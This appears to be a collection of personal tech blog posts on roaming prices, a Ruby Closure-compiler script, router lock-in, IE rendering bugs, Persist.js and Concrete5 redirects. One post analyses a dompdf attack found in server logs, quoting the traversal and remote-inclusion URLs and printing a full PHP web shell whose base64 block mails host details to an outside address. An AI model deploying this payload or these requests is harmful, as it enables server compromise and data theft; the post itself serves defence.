Two Drifters

IOTs = Inter-Operator Tariffs are predicted to fall to €0.08 per MB of data roaming in 2012. (source – data for Europe).

For 1 GB of data this reads as an end-consumer price of €119. Think of i.e. watching movies or HD television, or corporate data asset transfers … this can be used up in less than a day. For instance, watching Iplayer (streaming TV for Brits) in high quality uses up 320 MB for one hour. (source)

I calculated the price as follows:

€ 0.08 / MB x 1000 MB x 1.25 x 1.19 = € 119

It includes a proposed 25 % home operator surcharge on the wholesale IOT price (source – Australian data), and an additional 19 % VAT added on top of it all.

We need other solutions, and we need them fast. For comparison: Fonic of Germany gives you 5 GB data transfer for €25.

Here's some code to call closure (which is renamed closure.jar) from a ruby script:

def optimize_js(target)
#get all files in this folder, recurse over them
filecounter = 0
modifiedcounter = 0
Dir.glob(target + '*.js').each do|f|
puts "Processing #{f}"
filecounter += 1
my_js = `java -jar closure.jar –charset iso-8859-1 –js #{f}`
File.open(f, "w"){|con_file|
con_file.write(my_js)
}
end

puts "\n\t # JS Optimization: Done. Modified #{filecounter} files."
end

This code will overwrite the js files, so please be sure to operate on a copy of your files!

It is a function which takes a directory (target) and processes all files with the ending .js, replacing them in place with the optimized JS output. You need to put closure.jar in the same directory as the ruby script.

Note, that I also use the –charset iso-8859-1 option. This option ensures that closure reads the file in that iso charset, instead of assuming UTF-8. UTF-8 as default will work ok, until you have special characters from foreign languages, i.e. ä ö ü ß or á or whatever. Think Spanisch, French, German.

… die Box ist kastriert und unter der Kontrolle von Kabel Deutschland:

• FirmwareUpdates werden von Kabel Deutschland gemacht, nicht vom Benutzer
• Andere Internet-Telefonie-Provider kann man nicht eintragen. Das wird angeblich teilweise mit DNS-Sperren enforced

Das ist ein extrem trauriges Zeugnis, sowohl für Kabel Deutschland, als auch für die Firma AVM – deren Hardware sonst ein Muster für Kunden-Offenheit ist.

Es gibt ein Workaround (Google ist dein Freund), ich finde es allerdings NICHT OK dass man zu Workarounds greifen muss. Sogar wenn man de jure die Box gemietet hat, de facto soll sie einem nützen, und technisch die vollen Möglichkeiten bieten. Ohne künstliche Kastrierung, grr!

Und falls die anderen Provider tatsächlich blockiert werden, dann muss ich mir überlegen wieder vom Anschluss zurückzutreten.

Here are some pointers to useful tools and some solutions.

Good Geo IP location tool:

• http://www.ipligence.com/geolocation

Reading large Zimbra log files:

• Use gvim

/var/log/auth.log swamped by error messages (mail sudo: PAM adding faulty module: /lib/security/pam_smbpass.so):

This is an Ubuntu / Debian bug. Please follow this solution:

• http://geeklair.net/~pratzsch/blog/2008/05/pam-error-in-heron.html

Zimbra admin guide (PDF):

• http://files.zimbra.com/website/docs/7.0/zcs-ne-admin-guide-7.1.2.pdf

I have an IFRAME in my page which is positioned absolutely, and shown and hidden for overlaying additional information.

Testing IE 7 in a virtual machine crashed (processor load up to 100% for IE, no progress) this IFRAME for one specific page, others were fine.

I suspect that if the content in the IFRAME is going to be rendered in standards mode, this bug occurs. I force standards mode in my HTML documents by the appropriate <DOCTYPE> and a META Tag.

It is not present in either IE 6 or IE 9, so you might want to check for v 7 specifically and display a new window as workaround.

Sometimes programming for the web feels like herding a lot of cats, all meowing and running in different directions. Fix one thing, break another …

If you browse a web page from your harddrive (that is, not hosted on a local apache, calling localhost, but using file://) you might notice, that your $.getJSON requests won't work -> your application will break.

This is by design, and a security measure.

If you only load static information via JSON – which you probably would in such an environment, right?, one (crutch of a) solution would be to include the information as a new .JS file (include it in your HTML head) which sets up a variable containing this information. This variable will replace your .getJSON call by a simple assignment.

Yes, it seems to be by design (of Firefox' implementation of localstorage). It does not work for file:// URLs.

Persist.js currently has no workaround, the contents of your database will be cleared …

In order for Firefox to work offline, you have to remove the "localstorage" type manually, like this:

Persist.remove('localstorage');

Persist.js will issue a warning that globalStorage can't be used, and fall back to cookie storage, which has size limitations. On a side note, removing both localstorage and cookie storage will fall back to Flash. Flash will probably work, but it pops up a message which your users might find bewildering, and click away – viz:

What is left after removing localstorage, cookie and flash?

Nothing (as Gears is not available).

Cookie's the way to go – you will have to live with the size restraints!

The way to check for larger strings than the storage allows does not seem to work for me. I used:

Persist.size != -1 && Persist.size < JSON.stringify(tmp_answer_db).length

One work around for larger data might be to use a JS compressor to fit all into the cookie. Or save less – reduce to the essential! Don't use JSON, use your own notation. Even JSON is too large for the cookie.

Update: Detecting firefox in a local file:// environment and removing localstorage

//detect FireFox. If it's the Fox, AND running locally remove localstorage
if (/Firefox[\/\s](\d+\.\d+)/.test(navigator.userAgent) && window.location.protocol == 'file:'){
Persist.remove('localstorage');
}

After installing Varnish I can see pages which are frequently accessed.

//dompdf.php?input_file=http://www.fridela.com/slide/vero.txt?

And

/max/2009/06/bambooinvoice-und-pdf-briefpapier/dompdf.php?input_file=../../../../../../../../../../../../../../../../proc/self/environ%00

were lines which I found quite strange. Was someone abusing my server to convert their stuff to PDF?

I tried to go to fridela.com – it seems like a normal website, dedicated to selling food to housewives.

vero.txt is reported as dangerous by Microsoft Security Essentials.

I DO know that it's a text file, probably it's danger lies if used with the correct application. Here's the contents of vero.txt

<?
$win = strtolower(substr(PHP_OS,0,3)) == "win";
echo "PLaTo<br>";
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = true;
$hsafemode = "4ON6";
}
else {$safemode = false; $hsafemode = "3OFF6";}
$xos = wordwrap(php_uname(),90,"<br>",1);
$xpwd = @getcwd();
$OS = "<<".$hsafemode.">> ".$xos."";
echo "<center><A class=ria href=\"";echo'" DESIGNTIMESP=16110>http://".$OS."\">";echo "PLaTo</A></center><br>";
echo "<br>OSTYPE:$OS<br>";
echo "<br>Pwd:$xpwd<br>";
eval(base64_decode("aWYgKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSBvciBzdHJ0b2xvd2VyKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSkgPT0gIm9uIikgeyAkc2FmZW1vZGUgPSAiT04iOyB9IGVsc2UgeyAkc2FmZW1vZGUgPSAiT0ZGIjsgfSAkdmlzaXRvciA9ICRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOyAkZmxvYXQgPSAiRnJvbSA6IHZ1cmwgaW5mbyA8ZnVsbEBpbmZvLmNvbT4iOyAkYXJhbiA9IGV4ZWMoJ3VuYW1lIC1hOycpOyAkd2ViID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdOyAkaW5qID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07ICRib2R5ID0gIkJ1ZyBodHRwOi8vIi4kd2ViLiRpbmouIm5uU3ByZWFkIFZpYSA6ICIuJHZpc2l0b3IuIm5uS2VybmVsIFZlcnNpb24gOiAiLiRhcmFuLiJublNhZmUgTW9kZSA6ICIuJHNhZmVtb2RlOyBtYWlsKCJ1bml4b24yMDEwQGdtYWlsLmNvbSIsIlNldG9yYW4gQm9zICIuJHNhZmVtb2RlLCRib2R5LCRmbG9hdCk7"));
die("<center> ByroeNet </center>");
?>

The base64 part decodes to

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safem
ode = "ON"; } else { $safemode = "OFF"; } $visitor = $_SERVER["REMOTE_ADDR"]; $f
loat = "From : vurl info <full@info.com>"; $aran = exec('uname -a;'); $web = $_S
ERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $body = "Bug http://".$web.$
inj."nnSpread Via : ".$visitor."nnKernel Version : ".$aran."nnSafe Mode : ".$saf
emode; mail("unixon2010@gmail.com","Setoran Bos ".$safemode,$body,$float);

Actually the exploit has to be executed by DomPDF for it to work, i.e. meaning it should execute PHP code. After the exploit has been installed, a mail is sent to unixon2010@gmail.com

additional code seems to be hosted at http://www.fridela.com/slide/air.txt – it's apparently a control interface to the cracked server (maybe also injected via DomPDF).

Be careful around these. Turn off inclusion of remote URLs in your PHP.ini.

You want to use fixed positioning with CSS

If you want to make use of the simple CSS position:fixed; to display an element static to the viewport, you will run into problems with the Internet Explorer.

position:fixed is only supported since Internet Explorer 7

I tested this solution with IE 7.0.5730.13 on Windows XP. IE 6 does not support fixed positioning.

You need to enforce strict mode

Internet Explorer will default to "quirky rendering mode", if you don't add special tags to your HTML document:

<!DOCTYPE html>
<HTML>
<HEAD>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<title>Progress Test</title>
<meta http-equiv= "X-UA-Compatible"content="IE=Edge">
<script language = "JavaScript" src="../head.min.js"></script>
[...]

Both are essential! If you try IE 9 on the page without having added the meta tag X-UA-Compatible, it will render the page in quirky mode. And in quirky mode, it will ignore your position:fixed, and render your element where you have put it in the flow of the document.

Please note: I have read that this meta tag actually is not valid for this DOCTYPE.

It still does not work? I am testing with local documents!

Internet Explorer also takes into account where the element is being served from. This solution will work, if you upload your test documents to a server and access them over the Internet. It will not work (see note below) for local files, even if you use a local webserver to serve up the files (i.e. XAMPP). Internet Explorer will render your document in quirky mode, in this case.

Note: actually it does work offline (opening a document from the harddrive) in Internet Explorer 9 after fiddling somewhat with the document. I removed a IE compatibility script (not shown above), which I had included from Google previously. Check if you have one of those, and remove it!

URL Shortening is all the rage now. Sometimes you want to give people ridiculously long URLs, which might also be subject to change.

So you want to do it with C5, don't you?

Great, you think – there's the "add external link" menu option in Concrete's sitemap. Unfortunately it does not work the way you expect it to – it just adds the link to the Navigation, but no page alias to point to the external page (i.e. http://www.synapse-redaktion.de/FaceBook won't work after adding a "FaceBook" external link).

What to do to solve this dilemma?

My suggestion is to use both: add a (hidden) page "FaceBook" which does header JavaScript forwarding to the other page, so you can give out the links to the people, and a "real external link" so you don't have to rely on JavaScript for most of your visitors.

The SiteMap will look like this:

Adding custom attributes: (Header Extra Content, Exclude from Page List, Exclude from Nav)

The page's setup:

The script is easy:

<script type="text/javascript">
<!–
window.location = "http://www.surfnext.com"
//–>
</script>

with surfnext.com being the URL you are forwarding to.

If you have the time, you might want to add a static link or icon to the page (/*comment*/ the window.location = … part to be able to edit the page!) in case some person has their JavaScript turned off.